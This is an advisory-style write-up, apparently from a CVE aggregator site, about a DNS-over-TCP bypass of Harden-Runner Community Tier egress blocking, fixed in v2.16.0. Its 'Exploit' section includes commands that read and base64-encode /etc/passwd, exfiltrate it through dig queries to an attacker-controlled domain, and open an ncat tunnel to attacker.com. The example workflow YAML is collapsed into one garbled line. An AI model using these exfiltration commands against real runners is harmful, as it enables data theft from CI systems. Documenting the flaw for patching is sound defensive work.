Listen to this Post
A vulnerability in the Community Tier of Harden-Runner allows bypassing `egress-policy: block` network restrictions using DNS over TCP. Harden-Runner enforces egress policies on GitHub runners by filtering outbound connections at the network layer . When `egress-policy: block` is enabled with a restrictive `allowed-endpoints` list, all non-compliant traffic should be denied. However, DNS queries over TCP, commonly used for large responses or fallback from UDP, are not adequately restricted in versions prior to v2.16.0. Tools like `dig` can explicitly initiate TCP-based DNS queries (+tcp flag) without being blocked. This allows an attacker with existing code execution capabilities within the GitHub Actions workflow to establish outbound network communication that evades the configured network restrictions. The Enterprise Tier of Harden-Runner is not affected by this vulnerability. The issue is fixed in Harden-Runner Community Tier v2.16.0.
dailycve form:
Platform: Harden-Runner Community
Version: prior to v2.16.0
Vulnerability: TCP DNS bypass
Severity: Medium
Date: 2026-02-09
Prediction: Patch already available in v2.16.0
What Undercode Say:
Analytics:
This vulnerability is specific to the Community Tier’s egress blocking mechanism. It requires prior code execution on the runner, making it a post-exploitation vector for exfiltration or C2. The attack leverages a protocol difference (TCP DNS vs. UDP DNS) that was not fully accounted for in the network filter. The discoverer, Devansh Batham, responsibly disclosed the issue, and the fix was released in version 2.16.0.
Exploit:
An attacker with code execution on a compromised GitHub Actions runner can use the following command to bypass the egress block and communicate with an external server:
Query an external DNS resolver over TCP on port 53 to exfiltrate data or establish a tunnel
dig +tcp @8.8.8.8 example.com
A more practical exfiltration could encode data in subdomains:
data=$(cat /etc/passwd | base64 | tr -d '\n')
dig +tcp @8.8.8.8 "${data}.attacker-controlled.com"
Using ncat to establish a TCP connection over port 53 if a DNS tunnel is set up
ncat -v --ssl attacker.com 53
Protection from this CVE:
To mitigate this vulnerability, users of the Community Tier must upgrade to the patched version.
Example of a fixed workflow configuration name: CI on: [bash] jobs: build: runs-on: ubuntu-latest steps: Ensure you are using v2.16.0 or later - name: Harden-Runner uses: step-security/[email protected] with: egress-policy: block allowed-endpoints: | github.com:443 api.github.com:443 - name: Checkout code uses: actions/checkout@v4 ... rest of your workflow
For Enterprise Tier users, no action is required as they are not vulnerable.
Impact:
Successful exploitation allows an attacker with existing code execution to bypass network egress controls. This can lead to data exfiltration, communication with command-and-control servers, or downloading additional malicious tools, effectively nullifying the security benefits of the `egress-policy: block` setting in the Community Tier .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

